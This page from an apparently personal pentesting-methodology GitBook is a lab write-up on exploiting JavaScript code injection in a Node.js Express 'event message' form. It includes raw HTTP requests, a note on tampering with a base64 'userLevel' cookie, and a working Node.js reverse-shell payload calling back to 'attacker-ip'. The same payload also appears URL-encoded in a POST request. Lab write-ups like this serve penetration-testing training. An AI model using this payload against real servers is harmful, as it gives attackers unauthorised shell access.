Methodology
  • 😃Welcome
    • Bullet Proof Strategy
    • 👁️Enumeration
      • 👁️‍🗨️👁🗨 Enumeration Cheatsheet
      • SNMP Enumeration
      • IRC Enumeration
      • LDAP Enumeration
      • RPC Enumeration
      • DNS Enumeration
      • Rsync Enumeration
      • IDENT Enumeration
      • SMB Enumeration
        • Copy of SMBPass Change
      • Web Enumeration
        • Methodology
        • Enumerating Patterns Trick
      • Kerberos Enumeration
    • 👺Exploitation
      • Passwords Attacks
        • Decrypting VNC passwords
        • Decrypting Jenkins passwords
        • MongoDB Decryption
      • Web Applications
        • My little cheatsheet
        • Login Portal Strat
        • SQL injection
        • Local File Inclusion
        • WebDav
        • Wordpress
        • phpmyadmin
        • Bypassing Proxies
        • Node.Js Command Injection
        • Weak Cookies and Parameters
        • PHP Web Shells
        • Code Injection
        • Werkzeug
        • Collection of Vulnerable Apps
          • RaspAP 2.5 Authenticated RCE
          • ZenPhoto 1.4.1.4 RCE
          • Sonatype Nexus 3.21.1
          • Argus Surveillance DVR 4.0
          • SmarterMail + .Net Remote
          • H2 Web Console
          • Exhibitor for Zookeper (Exhibitor Web)
          • Subrion 4.2.1
          • RestStack API 3100
          • Kibana 5.6.15 < 6.6.1
          • Authenticated NodeBB Plugin Emoji 3.2.1
        • Discovering Hidden Parameters
        • 🕴️Jenkins
      • Vulnerable Services
        • Authenticated MSSQL Shell
        • Authenticated PostgresSQL
        • Authenticated MongoDB
        • ClamAV - Milter 0.91.2
        • Unreal Tournament 99
        • MS17-10 Eternal Blue
        • REDIS Exploitation
        • OpenSMTPD < 6.6.2
        • James Adminitrator Remoting 2.3.2
      • Client Side Attacks
        • .ODT File Macros
      • Evil-WinRM
      • Methodology
      • Reversing
        • .net binaries
      • Enumerating Firewall
    • 👽Privilege Escalation
      • Windows
        • Enumeration
        • Enumerate Permissions on Folders and Binaries
          • Insecure File Permissions
          • Modifiable Binary Path
          • Unquoted Service Path
        • Meterpreter Session Injection /Migration
        • ⏲️Scheduled Apps (CronJobs)
        • 🥔Impersonation Attacks
        • 🗒️DLL Hijacking
        • Passwords
          • Runas
            • Runas but Powershell
          • Autologon Credentials
        • AlwaysInstallElevated
        • Windows XP SP0/SP1
        • W10 Version 1803
        • Windows Vista x86 SP1
        • 👻SMB Ghost
        • Local Service / Network Service Users
        • Dangerous Privileges
          • SeLoadDriver Privilege
          • SeRestore Privilege
          • 🥔SeImpersonatePrivilege
          • SeBackUp Privilege
        • Bypassing AV
        • Port Forwarding to access Internal services
        • Start Up Apps
        • Other Users
        • Resources
        • M16-032
        • Upgrading Powershell to Meterpreter
      • Linux
        • Enumerating SUID binaries
          • Find SUID
          • CP SUID
          • dosbox SUID
          • start-stop-daemon SUID
          • gcore SUID
        • Fail2Ban Group
        • Upgrading TTY Shells
        • Git Repository
        • Escaping RBASH
        • Docker
        • Init, Init.d , systemd
        • Shared Objects .so Hijacking
        • Sudo Version - CVE 2021-4034
        • Tar Wilcard Injection
        • Tips to become root
        • Python based applications escalation
        • Internal Services
          • mySQL
            • MySQL User Defined Function
        • Writable Passwd
        • Exiftool Priv Esc
        • Glusterd + Docker Container Breakout
        • choom
        • Slack
      • File Transfer Methods
        • Windows
        • Linux
      • Pivoting
    • 💀Elevated Post Exploitation
    • 🟦Active Directory
      • Attack Vectors
        • LLMNR Poisoning
        • ASREPRoast
        • Spraying
          • SMBPass Change
        • Building Userbase
        • NTLM Relay Attack
        • IPv6 Takeover
      • Post Exploitation - Enumeration
        • Bloodhound
        • Enumeration - Powerview
      • Exploitation
        • Kerberoasting
        • GMSA Password Read
        • Account Operators
        • WriteDACL over DCSync
        • GenericWrite GPO
        • PS-Remoting
        • LAPS Password Read
        • Abusing ACLs
          • GenericWrite/GenericAll/AllExtendedRights over Users
        • Groups.xml
        • Azure AD Sync Dump
        • AD Recycle Bin Group
        • Get-ChangesAll
        • WriteOwner Over Domain Admins
        • Allowed to Delegate To:
        • Force Change Password
      • Resources
    • 😎Walkthroughs
      • 🪨Proving Grounds
      • 📗Hack The Box
        • Windows
        • Linux
    • Cert Pictures :)
    • 🐍Python Lessons
      • Jenkins Script Groovy Console Exploit in Python
      • Kerbrute Automation
    • 🐚Bash Lessons
    • C# Programming
      • Process Injection Code
Powered by GitBook
On this page
  1. Welcome
  2. Exploitation
  3. Web Applications

Node.Js Command Injection

PreviousBypassing ProxiesNextWeak Cookies and Parameters

Last updated 2 years ago

Weak authentication

The next interesting find is the add technical details/code if required Event Message. Considering that this is a NodeJS application, it might be possible to inject Javascript Code.

3000/tcp  open  http    syn-ack ttl 63 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

To test this, we'll send a simple 1+1 operation as an "Event Message".

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=khjkhk&msg=2%2B2

Notice the userLevel cookie how we can exploit it by changing it in base64.

After reviewing the resulting stored message, we confirm that it actually saved 2.

Since we already saw that the website was vulnerable to NodeJS command injection. We copied the following line of code. 

var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

Changing the script to connect to port 3000 and changing out listening host to our IP. Would result in a reverse shell.

Request Used: 

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B

Send event

😃
👺
Send event
Nodejs RCE and a simple reverse shelli break software - My work with different software, bug hunting and interesting tidbits
Event result
Logo